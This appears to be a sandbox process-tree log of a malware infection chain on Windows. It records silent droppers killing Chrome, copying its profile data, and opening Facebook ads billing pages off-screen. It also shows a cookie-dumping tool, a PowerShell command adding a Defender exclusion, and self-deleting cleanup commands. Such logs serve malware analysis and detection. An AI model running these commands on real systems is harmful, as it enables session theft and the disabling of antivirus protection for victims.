C:\Users\Admin\AppData\Local\Temp\5ju1e00d.whc\MultitimerFour.exe
5⤵
PID:14580

C:\Users\Admin\AppData\Local\Temp\0HNK744NFT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\0HNK744NFT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
6⤵
PID:14988

C:\Users\Admin\AppData\Local\Temp\0HNK744NFT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\0HNK744NFT\multitimer.exe" 1 3.1615302223.60478e4fd52a5 104
7⤵
PID:16104

C:\Users\Admin\AppData\Local\Temp\0HNK744NFT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\0HNK744NFT\multitimer.exe" 2 3.1615302223.60478e4fd52a5
8⤵
PID:18056

C:\Users\Admin\AppData\Local\Temp\avf3eqr5mfz\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\avf3eqr5mfz\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:19144

C:\Users\Admin\AppData\Local\Temp\is-LLBMN.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LLBMN.tmp\Setup3310.tmp" /SL5="$A04AC,802346,56832,C:\Users\Admin\AppData\Local\Temp\avf3eqr5mfz\Setup3310.exe" /Verysilent /subid=577
10⤵
PID:19236

C:\Users\Admin\AppData\Local\Temp\is-HN366.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HN366.tmp\Setup.exe" /Verysilent
11⤵
PID:8236

C:\Users\Admin\AppData\Local\Temp\is-6VPGN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6VPGN.tmp\Setup.tmp" /SL5="$803E6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HN366.tmp\Setup.exe" /Verysilent
12⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:12120

C:\Users\Admin\AppData\Local\Temp\is-N65IR.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N65IR.tmp\PictureLAb.tmp" /SL5="$70644,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\PictureLAb.exe" /Verysilent
14⤵
PID:12312

C:\Users\Admin\AppData\Local\Temp\is-MLS30.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MLS30.tmp\Setup.exe" /VERYSILENT
15⤵
PID:13524

C:\Users\Admin\AppData\Local\Temp\is-1V8NC.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1V8NC.tmp\Setup.tmp" /SL5="$20AD6,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-MLS30.tmp\Setup.exe" /VERYSILENT
16⤵
PID:13568

C:\Users\Admin\AppData\Local\Temp\is-C6P9V.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-C6P9V.tmp\def.exe" /S /UID=lab214
17⤵
PID:13804

C:\Users\Admin\AppData\Local\Temp\9e-4f176-673-3e0ad-58d53ce6ab4d7\Haebolysyje.exe
"C:\Users\Admin\AppData\Local\Temp\9e-4f176-673-3e0ad-58d53ce6ab4d7\Haebolysyje.exe"
18⤵
PID:11988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wd3xln2y.qzt\askinstall18.exe & exit
19⤵
PID:16144

C:\Users\Admin\AppData\Local\Temp\wd3xln2y.qzt\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\wd3xln2y.qzt\askinstall18.exe
20⤵
PID:16884

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
21⤵
PID:17260

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
22⤵
- Kills process with taskkill
PID:17688

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y
21⤵
PID:19152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
21⤵
PID:10332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x1c52dd36e00,0x1c52dd36e10,0x1c52dd36e20
22⤵
PID:16544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=2196 /prefetch:8
22⤵
PID:15160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1672 /prefetch:8
22⤵
PID:2828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
22⤵
PID:17680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2756 /prefetch:1
22⤵
PID:15508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
22⤵
PID:10320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
22⤵
PID:9464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
22⤵
PID:15868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
22⤵
PID:19028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
22⤵
PID:11596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4984 /prefetch:8
22⤵
PID:15844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
22⤵
PID:11284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
22⤵
PID:11844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
22⤵
PID:8372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
22⤵
PID:19560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
22⤵
PID:12136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,13842031358224610393,2203270090091687774,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=6196 /prefetch:8
22⤵
PID:3348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bbg0fxlt.jq4\customer4.exe & exit
19⤵
PID:14152

C:\Users\Admin\AppData\Local\Temp\bbg0fxlt.jq4\customer4.exe
C:\Users\Admin\AppData\Local\Temp\bbg0fxlt.jq4\customer4.exe
20⤵
PID:18188

C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"
21⤵
PID:18284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1elzlgqb.o4f\md7_7dfj.exe & exit
19⤵
PID:16676

C:\Users\Admin\AppData\Local\Temp\1elzlgqb.o4f\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\1elzlgqb.o4f\md7_7dfj.exe
20⤵
PID:19232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q3k1mmwr.gfg\GcleanerWW.exe /mixone & exit
19⤵
PID:18860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qckkey0w.3tl\privacytools5.exe & exit
19⤵
PID:19452

C:\Users\Admin\AppData\Local\Temp\qckkey0w.3tl\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\qckkey0w.3tl\privacytools5.exe
20⤵
PID:20304

C:\Users\Admin\AppData\Local\Temp\qckkey0w.3tl\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\qckkey0w.3tl\privacytools5.exe
21⤵
PID:11248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45vzsdai.spw\setup.exe /8-2222 & exit
19⤵
PID:9612

C:\Users\Admin\AppData\Local\Temp\45vzsdai.spw\setup.exe
C:\Users\Admin\AppData\Local\Temp\45vzsdai.spw\setup.exe /8-2222
20⤵
PID:5304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Crimson-Bush"
21⤵
PID:7116

C:\Program Files (x86)\Crimson-Bush\7za.exe
"C:\Program Files (x86)\Crimson-Bush\7za.exe" e -p154.61.71.51 winamp-plugins.7z
21⤵
PID:16344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Crimson-Bush\setup.exe" -map "C:\Program Files (x86)\Crimson-Bush\WinmonProcessMonitor.sys""
21⤵
PID:12640

C:\Program Files (x86)\Crimson-Bush\setup.exe
"C:\Program Files (x86)\Crimson-Bush\setup.exe" -map "C:\Program Files (x86)\Crimson-Bush\WinmonProcessMonitor.sys"
22⤵
PID:18708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmkgucdi.j1j\MultitimerFour.exe & exit
19⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\tmkgucdi.j1j\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\tmkgucdi.j1j\MultitimerFour.exe
20⤵
PID:2292

C:\Users\Admin\AppData\Local\Temp\VB3TL4RHM5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\VB3TL4RHM5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
21⤵
PID:9748

C:\Users\Admin\AppData\Local\Temp\VB3TL4RHM5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\VB3TL4RHM5\multitimer.exe" 1 3.1615302405.60478f0537c77 104
22⤵
PID:15552

C:\Users\Admin\AppData\Local\Temp\VB3TL4RHM5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\VB3TL4RHM5\multitimer.exe" 2 3.1615302405.60478f0537c77
23⤵
PID:15820

C:\Users\Admin\AppData\Local\Temp\z0jcuicmwju\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\z0jcuicmwju\askinstall24.exe"
24⤵
PID:16064

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
25⤵
PID:12336

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
26⤵
- Kills process with taskkill
PID:14364

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
25⤵
PID:16452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
25⤵
PID:19692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x21f5eea6e00,0x21f5eea6e10,0x21f5eea6e20
26⤵
PID:15808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1268,8994184626860215246,12052448361632795288,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1592 /prefetch:8
26⤵
PID:15488

C:\Users\Admin\AppData\Local\Temp\bpnpzwo1rol\hwbohuifbfm.exe
"C:\Users\Admin\AppData\Local\Temp\bpnpzwo1rol\hwbohuifbfm.exe" /ustwo INSTALL
24⤵
PID:16028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "hwbohuifbfm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bpnpzwo1rol\hwbohuifbfm.exe" & exit
25⤵
PID:11076

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "hwbohuifbfm.exe" /f
26⤵
- Kills process with taskkill
PID:6500

C:\Users\Admin\AppData\Local\Temp\4qdmxieuvy1\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\4qdmxieuvy1\Setup3310.exe" /Verysilent /subid=577
24⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\is-B5H0D.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B5H0D.tmp\Setup3310.tmp" /SL5="$909BA,802346,56832,C:\Users\Admin\AppData\Local\Temp\4qdmxieuvy1\Setup3310.exe" /Verysilent /subid=577
25⤵
PID:15760

C:\Users\Admin\AppData\Local\Temp\is-OA2DS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OA2DS.tmp\Setup.exe" /Verysilent
26⤵
PID:9560

C:\Users\Admin\AppData\Local\Temp\is-G1TNM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G1TNM.tmp\Setup.tmp" /SL5="$409B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-OA2DS.tmp\Setup.exe" /Verysilent
27⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\PictureLAb.exe" /Verysilent
28⤵
PID:14884

C:\Users\Admin\AppData\Local\Temp\is-R43OQ.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R43OQ.tmp\PictureLAb.tmp" /SL5="$C07A6,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\PictureLAb.exe" /Verysilent
29⤵
PID:18608

C:\Users\Admin\AppData\Local\Temp\is-TA5HG.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TA5HG.tmp\Setup.exe" /VERYSILENT
30⤵
PID:8584

C:\Users\Admin\AppData\Local\Temp\is-PLUH5.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PLUH5.tmp\Setup.tmp" /SL5="$40B98,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-TA5HG.tmp\Setup.exe" /VERYSILENT
31⤵
PID:18020

C:\Users\Admin\AppData\Local\Temp\is-QAR1E.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-QAR1E.tmp\def.exe" /S /UID=lab214
32⤵
PID:13936

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1280
33⤵
PID:12040

C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\Delta.exe" /Verysilent
28⤵
PID:9092

C:\Users\Admin\AppData\Local\Temp\is-SQ2R0.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SQ2R0.tmp\Delta.tmp" /SL5="$A04B6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\Delta.exe" /Verysilent
29⤵
PID:11904

C:\Users\Admin\AppData\Local\Temp\is-QPDIJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QPDIJ.tmp\Setup.exe" /VERYSILENT
30⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-QPDIJ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
31⤵
PID:9624

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
32⤵
- Kills process with taskkill
PID:16188

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
32⤵
- Delays execution with timeout.exe
PID:4376

C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\zznote.exe" /Verysilent
28⤵
PID:20292

C:\Users\Admin\AppData\Local\Temp\is-13PSS.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-13PSS.tmp\zznote.tmp" /SL5="$B04B6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\zznote.exe" /Verysilent
29⤵
PID:12188

C:\Users\Admin\AppData\Local\Temp\is-4VLTU.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-4VLTU.tmp\jg4_4jaa.exe" /silent
30⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-COQG9.tmp\hjjgaa.exe" /Verysilent
28⤵
PID:13580

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
29⤵
PID:8740

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
29⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\yx4ufptk2ah\vict.exe
"C:\Users\Admin\AppData\Local\Temp\yx4ufptk2ah\vict.exe" /VERYSILENT /id=535
24⤵
PID:12900

C:\Users\Admin\AppData\Local\Temp\is-TMGJR.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TMGJR.tmp\vict.tmp" /SL5="$D0818,870426,780800,C:\Users\Admin\AppData\Local\Temp\yx4ufptk2ah\vict.exe" /VERYSILENT /id=535
25⤵
PID:12472

C:\Users\Admin\AppData\Local\Temp\is-MR9RG.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-MR9RG.tmp\wimapi.exe" 535
26⤵
PID:16196

C:\Users\Admin\AppData\Local\Temp\xk2k2e22m0u\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\xk2k2e22m0u\chashepro3.exe" /VERYSILENT
24⤵
PID:13288

C:\Users\Admin\AppData\Local\Temp\is-3N0UM.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3N0UM.tmp\chashepro3.tmp" /SL5="$6098E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\xk2k2e22m0u\chashepro3.exe" /VERYSILENT
25⤵
PID:10048

C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\Delta.exe" /Verysilent
13⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\is-G54KR.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G54KR.tmp\Delta.tmp" /SL5="$80644,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\Delta.exe" /Verysilent
14⤵
PID:14436

C:\Users\Admin\AppData\Local\Temp\is-22S9D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-22S9D.tmp\Setup.exe" /VERYSILENT
15⤵
PID:14544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-22S9D.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
16⤵
PID:18640

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
17⤵
- Kills process with taskkill
PID:10948

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
17⤵
- Delays execution with timeout.exe
PID:19800

C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\zznote.exe" /Verysilent
13⤵
PID:15284

C:\Users\Admin\AppData\Local\Temp\is-U451D.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U451D.tmp\zznote.tmp" /SL5="$30A94,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\zznote.exe" /Verysilent
14⤵
PID:17520

C:\Users\Admin\AppData\Local\Temp\is-H3UM9.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-H3UM9.tmp\jg4_4jaa.exe" /silent
15⤵
PID:20012

C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-AEQQ5.tmp\hjjgaa.exe" /Verysilent
13⤵
PID:9936

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
14⤵
PID:17016

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
14⤵
PID:15740

C:\Users\Admin\AppData\Local\Temp\m25lgmedie0\vict.exe
"C:\Users\Admin\AppData\Local\Temp\m25lgmedie0\vict.exe" /VERYSILENT /id=535
9⤵
PID:19160

C:\Users\Admin\AppData\Local\Temp\is-4P26O.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4P26O.tmp\vict.tmp" /SL5="$5082E,870426,780800,C:\Users\Admin\AppData\Local\Temp\m25lgmedie0\vict.exe" /VERYSILENT /id=535
10⤵
PID:19332

C:\Users\Admin\AppData\Local\Temp\is-P5J19.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-P5J19.tmp\wimapi.exe" 535
11⤵
PID:20324

C:\Users\Admin\AppData\Local\Temp\nd5boeexojo\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\nd5boeexojo\askinstall24.exe"
9⤵
PID:19224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
10⤵
PID:20312

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
11⤵
- Kills process with taskkill
PID:6016

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
10⤵
PID:10816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
10⤵
PID:12276

C:\Program Files\Google\Chrome\Application\chrome.exe
